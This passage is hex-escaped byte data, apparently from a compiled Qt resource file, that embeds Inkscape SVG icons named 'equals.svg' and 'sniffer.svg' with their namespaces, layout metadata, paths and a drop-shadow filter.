\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x33\x32\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x33\
\x32\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x33\x32\x20\x33\x32\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x65\x71\x75\x61\x6c\x73\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\
\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\
\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\
\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\
\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x31\x36\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x78\x3d\x22\x2d\x37\x2e\x38\x33\x34\x30\x30\x32\
\x33\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x63\x79\x3d\x22\x39\x2e\x38\x31\x32\x35\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\
\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\
\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\
\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\
\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\
\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x34\
\x34\x38\x35\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\
\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\
\x61\x64\x61\x74\x61\x34\x34\x38\x38\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\
\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\
\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\
\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\
\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\
\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\
\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\
\x74\x6c\x65\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\
\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\
\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\
\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\
\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\
\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x74\
\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x6d\x6c\x3a\x73\
\x70\x61\x63\x65\x3d\x22\x70\x72\x65\x73\x65\x72\x76\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\
\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\
\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\
\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\
\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\
\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\
\x73\x69\x7a\x65\x3a\x38\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\
\x69\x67\x68\x74\x3a\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\
\x61\x6d\x69\x6c\x79\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\
\x64\x65\x20\x50\x72\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x2d\x66\x6f\x6e\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\
\x74\x69\x6f\x6e\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\
\x65\x20\x50\x72\x6f\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\x70\
\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\x3a\
\x23\x30\x30\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\
\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\x22\x38\x2e\
\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x79\x3d\x22\x37\
\x2e\x38\x37\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x74\x65\x78\x74\x35\x30\x39\x31\x22\x3e\x3c\x74\x73\x70\x61\
\x6e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\
\x6f\x64\x69\x3a\x72\x6f\x6c\x65\x3d\x22\x6c\x69\x6e\x65\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x73\x70\
\x61\x6e\x35\x30\x38\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x78\x3d\x22\x38\x2e\x33\x37\x35\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x79\x3d\x22\x31\x34\x2e\x38\x37\x35\x22\x20\x2f\
\x3e\x3c\x2f\x74\x65\x78\x74\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\
\x3d\x22\x74\x72\x61\x6e\x73\x6c\x61\x74\x65\x28\x2d\x32\x2e\x38\
\x30\x34\x36\x38\x37\x36\x2c\x2d\x30\x2e\x30\x35\x32\x37\x33\x34\
\x33\x29\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\x2d\
\x6c\x61\x62\x65\x6c\x3d\x22\x20\xe2\x89\x9f\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x6f\x6e\x74\x2d\
\x73\x74\x79\x6c\x65\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x76\x61\x72\x69\x61\x6e\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\
\x3b\x66\x6f\x6e\x74\x2d\x77\x65\x69\x67\x68\x74\x3a\x39\x30\x30\
\x3b\x66\x6f\x6e\x74\x2d\x73\x74\x72\x65\x74\x63\x68\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x73\x69\x7a\x65\x3a\x34\
\x30\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\
\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\
\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\
\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\
\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\
\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\
\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\
\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\
\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x74\x65\x78\x74\x35\x30\x34\x36\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x70\x61\x74\x68\x35\x36\x38\x37\x22\x0a\x20\x20\x20\x20\
\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\
\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\x61\x63\
\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\x6f\x6e\
\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x39\x34\x34\x38\x38\x31\x39\x32\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\x3a\x34\x3b\x73\x74\
\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\x72\x61\x79\x3a\x6e\
\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\
\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\
\x4d\x20\x33\x2e\x31\x30\x35\x34\x36\x38\x37\x2c\x31\x38\x2e\x31\
\x31\x39\x31\x34\x31\x20\x48\x20\x32\x38\x2e\x31\x34\x34\x35\x33\
\x31\x20\x76\x20\x34\x2e\x36\x32\x38\x39\x30\x36\x20\x48\x20\x33\
\x2e\x31\x30\x35\x34\x36\x38\x37\x20\x5a\x20\x6d\x20\x30\x2c\x2d\
\x38\x2e\x38\x38\x36\x37\x31\x39\x20\x48\x20\x32\x38\x2e\x31\x34\
\x34\x35\x33\x31\x20\x76\x20\x34\x2e\x35\x38\x39\x38\x34\x34\x20\
\x48\x20\x33\x2e\x31\x30\x35\x34\x36\x38\x37\x20\x5a\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\x75\
\x72\x65\x3d\x22\x30\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\
\x0a\x3c\x2f\x73\x76\x67\x3e\x0a\
\x00\x00\x16\x45\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x6f\
\x73\x62\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\
\x70\x65\x6e\x73\x77\x61\x74\x63\x68\x62\x6f\x6f\x6b\x2e\x6f\x72\
\x67\x2f\x75\x72\x69\x2f\x32\x30\x30\x39\x2f\x6f\x73\x62\x22\x0a\
\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\x63\x3d\x22\x68\x74\x74\
\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\
\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\x2e\x31\x2f\x22\x0a\x20\
\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\x3d\x22\x68\x74\x74\x70\
\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\x65\x63\x6f\x6d\x6d\x6f\
\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\x22\x0a\x20\x20\x20\x78\
\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\
\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x31\x39\x39\x39\
\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\x2d\x73\x79\x6e\x74\x61\
\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\
\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\
\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\
\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\x68\x74\x74\x70\x3a\x2f\
\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\x73\x6f\x75\x72\x63\x65\
\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\x44\x54\x44\x2f\x73\x6f\
\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\x74\x64\x22\x0a\x20\x20\
\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\x73\x63\x61\x70\x65\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\x61\x6d\x65\x73\x70\x61\
\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\x70\x65\x22\x0a\x20\x20\
\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\x70\x78\x22\x0a\x20\x20\
\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x36\x70\x78\x22\x0a\x20\
\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x31\
\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\x69\x64\x3d\x22\x53\x56\
\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\
\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\x22\x73\x6e\x69\x66\
\x66\x65\x72\x2e\x73\x76\x67\x22\x0a\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x30\x2e\
\x39\x32\x2e\x31\x20\x72\x22\x3e\x0a\x20\x20\x3c\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\x69\x65\x77\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\x65\x22\x0a\x20\x20\
\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x66\
\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\x36\x36\x36\x36\x36\
\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x6f\x70\x61\
\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x6f\x70\x61\
\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\x67\x65\x73\x68\x61\
\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\x22\x33\x32\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\
\x3d\x22\x32\x2e\x37\x38\x34\x38\x34\x36\x39\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x39\
\x2e\x35\x37\x33\x34\x36\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\
\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\
\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\
\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\
\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\
\x68\x3d\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\
\x69\x67\x68\x74\x3d\x22\x31\x31\x34\x31\x22\x0a\x20\x20\x20\x20\
\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\
\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\
\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\
\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x35\x30\x33\x36\
\x22\x3e\x0a\x20\x20\x20\x20\x3c\x6c\x69\x6e\x65\x61\x72\x47\x72\
\x61\x64\x69\x65\x6e\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\
\x3d\x22\x6c\x69\x6e\x65\x61\x72\x47\x72\x61\x64\x69\x65\x6e\x74\
\x37\x30\x37\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x62\
\x3a\x70\x61\x69\x6e\x74\x3d\x22\x73\x6f\x6c\x69\x64\x22\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x73\x74\x6f\x70\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x73\x74\x6f\x70\
\x2d\x63\x6f\x6c\x6f\x72\x3a\x23\x61\x61\x63\x63\x66\x66\x3b\x73\
\x74\x6f\x70\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x66\x66\x73\x65\x74\x3d\
\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x73\x74\x6f\x70\x37\x30\x37\x37\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x3c\x2f\x6c\x69\x6e\x65\x61\x72\x47\x72\x61\x64\x69\x65\
\x6e\x74\x3e\x0a\x20\x20\x20\x20\x3c\x66\x69\x6c\x74\x65\x72\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x63\x6f\
\x6c\x6f\x72\x2d\x69\x6e\x74\x65\x72\x70\x6f\x6c\x61\x74\x69\x6f\
\x6e\x2d\x66\x69\x6c\x74\x65\x72\x73\x3a\x73\x52\x47\x42\x3b\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x44\x72\x6f\x70\x20\x53\x68\x61\
\x64\x6f\x77\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x66\x69\x6c\x74\x65\x72\x39\x31\x34\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x66\x65\x46\x6c\x6f\x6f\x64\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x6f\x70\x61\x63\x69\x74\
\x79\x3d\x22\x30\x2e\x34\x39\x38\x30\x33\x39\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x20\x66\x6c\x6f\x6f\x64\x2d\x63\x6f\x6c\x6f\
\x72\x3d\x22\x72\x67\x62\x28\x30\x2c\x30\x2c\x30\x29\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x3d\x22\
\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x69\x64\x3d\x22\x66\x65\x46\x6c\x6f\x6f\x64\x39\x30\x34\x22\x20\
\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x66\x65\x43\x6f\x6d\x70\
\x6f\x73\x69\x74\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\
\x6e\x3d\x22\x66\x6c\x6f\x6f\x64\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x6e\x32\x3d\x22\x53\x6f\x75\x72\x63\x65\x47\x72\
\x61\x70\x68\x69\x63\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\
\x6f\x70\x65\x72\x61\x74\x6f\x72\x3d\x22\x69\x6e\x22\x0a\x20\x20\
